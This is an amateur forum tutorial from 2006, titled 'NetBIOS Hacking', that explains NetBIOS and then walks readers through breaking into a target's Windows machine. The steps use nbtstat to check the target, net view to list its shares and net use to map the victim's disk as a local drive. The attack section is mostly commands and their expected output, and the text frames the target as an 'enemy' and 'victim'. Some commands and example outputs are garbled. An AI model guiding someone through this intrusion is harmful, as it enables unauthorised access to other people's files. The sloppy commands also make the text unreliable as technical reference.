NetBIOS Hacking

By ghost | 8893 Reads |

0     0

• ============================Sunday, August 20 , 2006
  • Name Type Status

NetBIOS Hacking

**** | By g077ch4 | ****

¶============================ Sunday, August 20 , 2006

Disclaimer: I have written this here article for education purposes only. Using NetNIOS is probably the easiest ways of hacking or rooting someone remotly. So if you go and get success on someone with NetBIOS, then FBI catches you. Then this is your fault because this article written for you to know in theory so whatever you do after reading this article was your choice no matter what. So it is not my fault neither is it HBH’s fault.

Chapters:

What Is NetBIOS

nbtstat

What do I need for this?

Types Of attacks

Hack Part One

==================================

What is NetBIOS?

NetBIOS was made by IBM and Sytek used for an application programming interface(API) for client software for public access NetBios stands for: Network-Basic-Input-Output System.NetBios is an API used by application programs on a PC LAN that uses MS-DOS or some version of UNIX, providing application developers with a uniform set of commands for requesting lower-level network services. NetBIOS is also is a communication protocol used by Windows for communication on a LAN. When you browse the network neighborhood for other computers, netbios is involved. Like any other service or API NetBIOS has been assigned to a port number. This is port number 139.NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various information of the computers on a network . These Include:

1. Name of the computer

2. Username

3. Domain

4. Computer Name

5. and many others.

==================================

Nbtstat

Nbtstat is a command performed in command promt or MS-DOS. You can reach any of these by going to start>run>cmd. Or start>run>command. And last but not least that I know of start>run>command.com. But I just use cmd. If you want more information on “nbtstat” then go to MD-DOS or cmd and type nbtstat and it drops a bunch of information that is very useful to your knowledge of Nbtstat and NetBIOS. When you open cmd it should look like this:

C:\windows>

or for some people it might be

Microsoft Windows XP [Version ***] <C> Copyright 1985-2001 Microsoft Crop.

C:\documents and Settings***>

Which ever is fine.

==================================

Now we check if you enemy or target is vulnerable to NetBIOS hacking. But before anything else you should first have their IP address. Now open up cmd and type:

nbtstat -a ipaddress

Replace “ipaddess” with your targets ip address. Now if you get this then it is not vulnerable:

Local Area Connection Node IpAddress: [127.0.0.1] scope Id: []

Host not found.

==================================

But if you get something like this then it is vulnerable:

NetBIOS Remote Machine Name Table

¶Name Type Status

user <00> UNIQUE Registered workgroup <00> GROUP Registered user <03> UNIQUE Registered user <20> UNIQUE Registered

MAC Address = 00-02-44-14-23-E6

Note the <20>. It shows that the victim has enabled the file and printer sharing. So other wise if the <20> isnt there then its also not vulnerable.

Next we will use cmd. Type in the following: net view \127.0.0.1

If you get this then your good again:

Shared resources at \203.195.136.156 ComputerNameGoesHere

Share name Type Used as Comment

CDISK Disk

The command completed successfully. DISK“ shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like

Shared resources at \127.0.0.1

ComputerNameGoesHere

Share name Type Used as Comment c:\windows>net use k: \127.0.0.1\CDISK

You may replace k letter by any other letter.

If the command is successful we will get the confirmation - The command was completed successfullly

The command was completed successfully

Now just double click on the My Computer icon on your desktop and you will be a happy hacker!

We have just crested a new drive k! Just double click on it and you will find that you are able to access the remote computer’s hard disk. Enjoy your first hack!

Also I would like to thank info-x.co.uk for giving me most fo my information for this article